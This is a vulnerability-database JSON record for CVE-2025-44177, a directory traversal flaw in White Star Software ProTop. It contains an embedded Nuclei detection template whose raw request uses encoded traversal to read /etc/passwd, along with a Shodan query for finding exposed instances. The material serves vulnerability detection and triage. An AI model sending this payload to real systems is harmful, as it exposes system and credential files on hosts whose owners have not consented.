{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-44177/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-44177/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-44177/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-44177/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-44177/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-44177"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-44177"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.04341,
      "kev": false,
      "percentile": 0.90837
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-44177.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2025-44177\n\ninfo:\n  name: White Star Software ProTop - Directory Traversal\n  author: s-cu-bot\n  severity: high\n  description: |\n    A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences.\n  impact: |\n    Unauthenticated attackers can read arbitrary files from the operating system through encoded traversal sequences in the /pt3upd/ endpoint, potentially exposing sensitive configuration and credential files.\n  remediation: |\n    Upgrade White Star Software ProTop to a version after v4.4.2-2024-11-27.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-44177\n    - https://client.protop.co.za/\n    - https://wss.com/\n    - https://gist.github.com/stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N\n    cvss-score: 8.2\n    cve-id: CVE-2025-44177\n    epss-score: 0.04341\n    epss-percentile: 0.90837\n    cwe-id: CWE-22\n    cpe: cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: white-star-software\n    product: protop\n    shodan-query: html:\"<title>ProTop\"\n  tags: cve,cve2025,lfi,traversal,protop,whitestar,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - 'root:.*:0:0:'\n\n      - type: word\n        part: header\n        words:\n          - 'application/octet-stream'\n          - 'filename=\"passwd\"'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100adc1c252b90213e890bf5ee04ca965aa98909832db1b082a903ea7c446a38259022100aee95fc85df32efecce0d7ecc1f3cde74813311e09dd49cfd23286f7627cdca7:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-44177"
}